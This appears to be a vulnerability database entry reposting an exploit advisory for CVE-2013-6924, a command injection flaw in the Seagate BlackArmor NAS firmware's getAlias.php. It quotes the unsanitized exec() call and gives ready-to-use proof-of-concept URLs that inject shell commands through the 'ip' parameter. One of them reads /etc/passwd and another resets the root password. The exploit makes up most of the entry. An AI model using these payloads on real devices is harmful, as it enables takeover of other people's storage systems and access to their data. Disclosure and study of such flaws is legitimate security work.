Seagate BlackArmor NAS sg2000-2000.1331远程代码执行漏洞

2014-01-0600:00:00

Root

www.seebug.org

0.03 Low

EPSS

Percentile

90.9%

JSON

No description provided by source.


                                                # Exploit Title: Seagate BlackArmor NAS - Remote Command Execution
 
# Google Dork: N/A
 
# Date: 04-01-2014
 
# Exploit Author: Jeroen - IT Nerdbox
 
# Vendor Homepage:  &lt;http://www.seagate.com/&gt; http://www.seagate.com/
 
# Software Link:
&lt;http://www.seagate.com/support/downloads/item/banas-220-firmware-master-dl/
&gt;
http://www.seagate.com/support/downloads/item/banas-220-firmware-master-dl/
 
# Version: sg2000-2000.1331
 
# Tested on: N/A
 
# CVE : CVE-2013-6924
 
#
 
## Description:
 
#
 
# The file getAlias.php located in /backupmgt has the following lines:
 
#
 
# $ipAddress = $_GET[&quot;ip&quot;;
 
# if ($ipAddress != &quot;&quot;) {
 
#    exec(&quot;grep -I $ipAddress $immedLogFile &gt; aliasHistory.txt&quot;);
 
#    ..
 
#    ..
 
# }
 
#
 
# The GET parameter can easily be manipulated to execute commands on the
BlackArmor system.
 
#
 
## Proof of Concept:
 
#
 
# http(s)://&lt;ip | host&gt;/backupmgt/getAlias.php?ip=xx /etc/passwd; &lt;your
command here&gt;;
 
#
 
## Example to change the root password to 'mypassword':
 
#
 
# http(s)://&lt;ip | host&gt;/backupmgt/getAlias.php?ip=xx /etc/passwd; echo
'mypassword' | passwd --stdin;

0.03 Low

EPSS

Percentile

90.9%

JSON

Related for SSV:61288